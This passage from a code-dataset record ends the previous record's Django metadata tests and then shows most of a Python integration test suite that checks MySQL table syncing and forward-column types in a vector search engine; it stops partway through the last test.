nc_aggr.metadata.temporal_coverage.value[temp_date])
# update file set spatial coverage from contents
url_params = {'file_type_id': fs_aggr.id,
'coverage_type': 'spatial'
}
url = reverse('update_fileset_coverage', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing for updating the file set spatial coverage
response = update_aggregation_coverage(request, file_type_id=fs_aggr.id,
coverage_type='spatial')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# test the file set spatial coverage same as that of the NC aggregation
for limit in ('northlimit', 'eastlimit', 'southlimit', 'westlimit'):
self.assertEqual(fs_aggr.metadata.spatial_coverage.value[limit],
nc_aggr.metadata.spatial_coverage.value[limit])
self.composite_resource.delete()
def _add_delete_keywords_file_type(self, file_path, file_type):
self.create_composite_resource(file_path)
res_file = self.composite_resource.files.first()
# set specific file type
if file_type == "GeoRasterLogicalFile":
GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
else:
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, file_type)
if file_type != "NetCDFLogicalFile":
# no keyword metadata for the raster file type yet
self.assertEqual(len(logical_file.metadata.keywords), 0)
else:
# one keyword metadata for the netcdf file type
self.assertEqual(len(logical_file.metadata.keywords), 1)
# at this point resource should have all the keywords that we have for the file type
res_keywords = [subject.value for subject in
self.composite_resource.metadata.subjects.all()]
for kw in logical_file.metadata.keywords:
self.assertIn(kw, res_keywords)
# add keywords at the file level
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id
}
url = reverse('add_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
request.user = self.user
# this is the view function we are testing
response = add_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# there should be 2 keywords for the raster file type yet
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
if file_type != "NetCDFLogicalFile":
self.assertEqual(len(logical_file.metadata.keywords), 2)
else:
self.assertEqual(len(logical_file.metadata.keywords), 3)
self.assertIn('keyword-1', logical_file.metadata.keywords)
self.assertIn('keyword-2', logical_file.metadata.keywords)
# resource level keywords must have been updated with the keywords we added
# to file level
res_keywords = [subject.value for subject in
self.composite_resource.metadata.subjects.all()]
for kw in logical_file.metadata.keywords:
self.assertIn(kw, res_keywords)
# delete keyword
url = reverse('delete_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keyword': 'keyword-1'})
request.user = self.user
# this is the view function we are testing
response = delete_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
if file_type != "NetCDFLogicalFile":
self.assertEqual(len(logical_file.metadata.keywords), 1)
else:
self.assertEqual(len(logical_file.metadata.keywords), 2)
self.assertIn('keyword-2', logical_file.metadata.keywords)
# test that deleting a file level keyword doesn't delete the same keyword from
# resource level
self.assertIn('keyword-1', res_keywords)
self.composite_resource.delete()
| 53.745977
| 100
| 0.677388
| 11,341
| 93,518
| 5.334274
| 0.033948
| 0.057277
| 0.081229
| 0.053293
| 0.914143
| 0.899762
| 0.882488
| 0.865363
| 0.840882
| 0.82822
| 0
| 0.009155
| 0.238435
| 93,518
| 1,739
| 101
| 53.776883
| 0.84027
| 0.165679
| 0
| 0.7725
| 0
| 0
| 0.095312
| 0.015669
| 0
| 0
| 0
| 0
| 0.246667
| 1
| 0.034167
| false
| 0.001667
| 0.009167
| 0
| 0.044167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3cbcc386c71883d2a7a0a99c98a9462b69397b2
| 88,071
|
py
|
Python
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 103
|
2021-09-30T03:54:41.000Z
|
2022-03-30T09:05:11.000Z
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 10
|
2021-11-02T02:31:12.000Z
|
2022-03-24T07:56:21.000Z
|
tests/integration/src/case/test_mysql_repository.py
|
divenswu/proximabilin
|
9eb7db8f215e4ac5f43023c725fbc4997c2ccaee
|
[
"Apache-2.0"
] | 21
|
2021-10-18T04:35:48.000Z
|
2022-03-29T08:04:38.000Z
|
# Copyright 2021 Alibaba, Inc. and its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import struct
import grpc
import unittest
import time
import os
import random
from pyproximabe import *
from global_conf import GlobalConf
from collection_creator import CollectionCreator
from mysql_client import MysqlClient
from server_utils import ServerUtils
import client_helper
class TestMysqlRepository(unittest.TestCase):
def setUp(self):
self.global_conf = GlobalConf()
self.creator = CollectionCreator()
self.client = client_helper.get_client(self.global_conf)
self.mysql_client = MysqlClient()
self.creator = CollectionCreator()
self.server_utils = ServerUtils()
self.repository_name = "test_repo"
self.clean_env()
ret = self.mysql_client.execute_batch_sql("data/test_clean_db.sql")
self.assertEqual(ret, 0)
def tearDown(self):
self.clean_env()
time.sleep(1)
def clean_env(self):
status, collections = self.client.list_collections()
self.assertTrue(status.ok())
for collection in collections:
status = self.client.drop_collection(collection.collection_config.collection_name)
self.assertTrue(status.ok())
def get_content(self, file_name):
src_path = os.getenv('SRC_PATH')
f = open(src_path + '/tests/integration/log/' + file_name, 'r')
return f.read()
def create_schema(self, collection_name,
repository_table="test_collection",
forward_columns=["col_a", "col_b"],
index_columns=[],
index_dimensions=[],
index_data_types=None,
index_measures=None):
return self.creator.create_schema(collection_name,
repository_table=repository_table,
repository_name="test_repo",
forward_columns=forward_columns,
index_columns=index_columns,
index_dimensions=index_dimensions,
index_data_types=index_data_types,
index_measures=index_measures,
db_name="test_db",
with_repo=True)
def query(self, collection_name, topk=10, column_name='column1'):
features = [1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,1]
return self.client.query(collection_name,
column_name,
features,
data_type=DataType.VECTOR_FP32,
dimension=16,
batch_count=1,
topk=topk,
is_linear=True)
def create_query(self, collection_name, topk=10, column_name='column1'):
query = query_service_pb2.QueryRequest()
query.query_type = query_service_pb2.QueryType.QT_KNN
query.collection_name = collection_name
query.knn_params.column_name = column_name
query.knn_params.topk = topk
query.knn_params.dimension = 16
query.knn_params.feature_type = common_pb2.FeatureType.FT_FP32
features = [1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,1]
fea_bytes = []
for f in features:
fea_bytes += struct.pack('f', f)
query.knn_params.features = bytes(fea_bytes)
query.knn_params.batch_count = 1
query.knn_params.is_linear = True
return query
def get_latest_lsn(self, collection_name):
status, collection = self.client.describe_collection(collection_name)
self.assertTrue(status.ok())
return collection.latest_lsn_context
def test_scan_full_table(self):
collection_name = 'test_scan_full_table'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
ret = self.mysql_client.execute_batch_sql('data/test_scan_table.sql')
self.assertEqual(ret, 0)
time.sleep(2)
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
self.assertEqual(len(documents), 2)
self.assertEqual(documents[0].primary_key, 1)
self.assertEqual(documents[0].score, 0.0)
self.assertAlmostEqual(documents[0].forward_column_values['col_a'],
11.111, delta=0.000001)
self.assertEqual(documents[0].forward_column_values['col_b'], 100)
self.assertEqual(documents[1].primary_key, 2)
self.assertEqual(documents[1].score, 1.0)
self.assertAlmostEqual(documents[1].forward_column_values['col_a'],
12.111, delta=0.000001)
self.assertEqual(documents[1].forward_column_values['col_b'], 200)
def test_scan_full_table_with_empty_table(self):
collection_name = 'full_table_with_empty_table'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
ret = self.mysql_client.execute_batch_sql('data/test_scan_full_table_with_empty_table.sql')
self.assertEqual(ret, 0)
time.sleep(2)
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
self.assertEqual(len(documents), 0)
def test_increment_mode(self):
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_increment_mode_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_increment_mode'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
self.assertEqual(len(documents), 2)
self.assertEqual(documents[0].primary_key, 1)
self.assertEqual(documents[0].score, 0.0)
self.assertAlmostEqual(documents[0].forward_column_values['col_a'],
11.111, delta=0.000001)
self.assertEqual(documents[0].forward_column_values['col_b'], 100)
self.assertEqual(documents[1].primary_key, 2)
self.assertEqual(documents[1].score, 1.0)
self.assertAlmostEqual(documents[1].forward_column_values['col_a'],
12.111, delta=0.000001)
self.assertEqual(documents[1].forward_column_values['col_b'], 200)
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_increment_mode_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
self.assertEqual(len(documents), 7)
for i in range(0, 7):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_forward_with_numeric(self):
collection_name = 'test_forward_with_numeric'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_numeric_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], 121 + i)
self.assertEqual(documents[i].forward_column_values['f2'], 20001 + i)
self.assertEqual(documents[i].forward_column_values['f3'], 65601 + i)
self.assertEqual(documents[i].forward_column_values['f4'], 2000000001 + i)
self.assertEqual(documents[i].forward_column_values['f5'], 8000000001 + i)
self.assertAlmostEqual(documents[i].forward_column_values['f6'], 1.1234 + i, delta=0.0001)
self.assertAlmostEqual(documents[i].forward_column_values['f7'], 1.11223344 + i, delta=0.00001)
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_numeric_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(1, total + 1):
self.assertEqual(documents[i - 1].primary_key, i + 1)
self.assertEqual(documents[i - 1].score, i * i)
self.assertEqual(documents[i - 1].forward_column_values['f1'], 121 + i)
self.assertEqual(documents[i - 1].forward_column_values['f2'], 20002 + i)
self.assertEqual(documents[i - 1].forward_column_values['f3'], 65601 + i)
self.assertEqual(documents[i - 1].forward_column_values['f4'], 2000000001 + i)
self.assertEqual(documents[i - 1].forward_column_values['f5'], 8000000001 + i)
self.assertAlmostEqual(documents[i - 1].forward_column_values['f6'], 1.1234 + i, delta=0.0001)
self.assertAlmostEqual(documents[i - 1].forward_column_values['f7'], 1.11223344 + i, delta=0.00001)
def test_forward_with_date_and_time(self):
collection_name = 'test_forward_with_date_and_time'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4', 'f6']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], '2021-01-1' + str(i + 2))
self.assertEqual(documents[i].forward_column_values['f2'], '13:00:0' + str(i + 1))
self.assertEqual(documents[i].forward_column_values['f3'], '2021-01-1%d 13:00:0%d' % (i + 2, i + 1))
self.assertEqual(documents[i].forward_column_values['f4'], '2021-01-1%d 13:00:00' % (i + 2))
self.assertEqual(documents[i].forward_column_values['f6'], '2021')
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 7
self.assertEqual(len(documents), total)
for i in range(1, total + 1):
self.assertEqual(documents[i-1].primary_key, i + 1)
self.assertEqual(documents[i-1].score, i * i)
self.assertEqual(documents[i-1].forward_column_values['f1'], '2021-01-1' + str(i + 2))
self.assertEqual(documents[i-1].forward_column_values['f2'], '13:00:0' + str(i + 1))
self.assertEqual(documents[i-1].forward_column_values['f3'], '2021-01-1%d 13:00:0%d' % (i + 2, i + 1))
self.assertEqual(documents[i-1].forward_column_values['f4'], '2021-01-1%d 13:00:00' % (i + 2))
self.assertEqual(documents[i-1].forward_column_values['f6'], '2021')
def test_forward_with_date_and_time_included_fracation(self):
collection_name = 'test_forward_with_date_and_time_frac'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_frac_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4', 'f6']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], '2021-01-1' + str(i + 2))
self.assertEqual(documents[i].forward_column_values['f2'], '13:00:0%d.9' %(i + 1))
self.assertEqual(documents[i].forward_column_values['f3'], '2021-01-1%d 13:00:0%d.123' % (i + 2, i + 1))
self.assertEqual(documents[i].forward_column_values['f4'], '2021-01-1%d 13:00:00.123456' % (i + 2))
self.assertEqual(documents[i].forward_column_values['f6'], '2021')
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_date_and_time_frac_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 7
self.assertEqual(len(documents), total)
for i in range(1, total + 1):
self.assertEqual(documents[i-1].primary_key, i + 1)
self.assertEqual(documents[i-1].score, i * i)
self.assertEqual(documents[i-1].forward_column_values['f1'], '2021-01-1' + str(i + 2))
self.assertEqual(documents[i-1].forward_column_values['f2'], '13:00:0%d.9' %(i + 1))
self.assertEqual(documents[i-1].forward_column_values['f3'], '2021-01-1%d 13:00:0%d.123' % (i + 2, i + 1))
self.assertEqual(documents[i-1].forward_column_values['f4'], '2021-01-1%d 13:00:00.123456' % (i + 2))
self.assertEqual(documents[i-1].forward_column_values['f6'], '2021')
def test_forward_with_char_and_varchar(self):
collection_name = 'test_forward_with_char_and_varchar'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_char_and_varchar_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_char_and_varchar_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
def test_forward_with_text(self):
collection_name = 'test_forward_with_text'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))
def test_forward_with_text_gbk(self):
collection_name = 'test_forward_with_text_gbk'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_gbk_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('我是向量检索引擎'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4 + '你'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3 + '你'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257 + '你'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_gbk_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('我是向量检索引擎'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4 + '你'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3 + '你'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257 + '你'))
def test_forward_with_blob(self):
collection_name = 'test_forward_with_blob'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_blob_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('\xf1\xf2\xf3\xf4').encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('utf-8'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_blob_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('\xf1\xf2\xf3\xf4').encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('utf-8'))
def test_forward_with_blob_gbk(self):
collection_name = 'test_forward_with_blob_gbk'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_blob_gbk_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('我').encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f2'], ('你' + str(i + 1) * 4).encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3).encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('gbk'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_blob_gbk_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('我').encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f2'], ('你' + str(i + 1) * 4).encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3).encode('gbk'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('gbk'))
def test_forward_with_bit(self):
collection_name = 'test_forward_with_bit'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_bit_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 3
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], i)
self.assertEqual(documents[i].forward_column_values['f2'], i + 128)
self.assertEqual(documents[i].forward_column_values['f3'], i + 65535)
self.assertEqual(documents[i].forward_column_values['f4'], i + 5000000000)
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_bit_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], i)
self.assertEqual(documents[i].forward_column_values['f2'], i + 128)
self.assertEqual(documents[i].forward_column_values['f3'], i + 65535)
self.assertEqual(documents[i].forward_column_values['f4'], i + 5000000000)
def test_forward_with_binary_and_varbinary(self):
collection_name = 'test_forward_with_binary_and_varbinary'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_binary_and_varbinary_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('\xf1' + '\x00' * 15).encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4 + '\x00' * 60).encode('utf-8'))
self.assertEqual(documents[i].forward_column_values['f3'], ('\xf1' * 3).encode('ISO-8859-1'))
self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257).encode('utf-8'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_binary_and_varbinary_inc.sql')
self.assertEqual(ret, 0)
